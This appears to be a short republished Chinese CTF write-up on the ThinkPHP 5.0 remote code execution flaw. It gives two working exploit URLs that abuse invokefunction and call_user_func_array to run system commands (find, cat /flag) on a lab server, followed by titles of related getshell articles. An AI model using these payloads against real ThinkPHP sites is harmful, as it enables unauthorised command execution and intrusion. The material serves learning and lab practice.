ThinkPHP 5.0 版本存在getshell漏洞 php_rce

Posted clqnotes

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ThinkPHP 5.0 版本存在getshell漏洞 php_rce相关的知识,希望对你有一定的参考价值。

查找flag:http://111.198.29.45:45747/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

payload:http://111.198.29.45:45747/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag 得到flag

参考自:https://blog.csdn.net/weixin_45425482/article/details/103709085

学习用途

技术图片技术图片

以上是关于ThinkPHP 5.0 版本存在getshell漏洞 php_rce的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP5.x.x各版本实战环境getshell

ThinkPHP 5.x远程命令执行漏洞分析与复现

利用Thinkphp 5缓存漏洞实现前台Getshell

ThinkPHP V5(漏洞解析及利用)及tornado知识点

漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)

Thinkphp <= 5.0.10 缓存getshell复现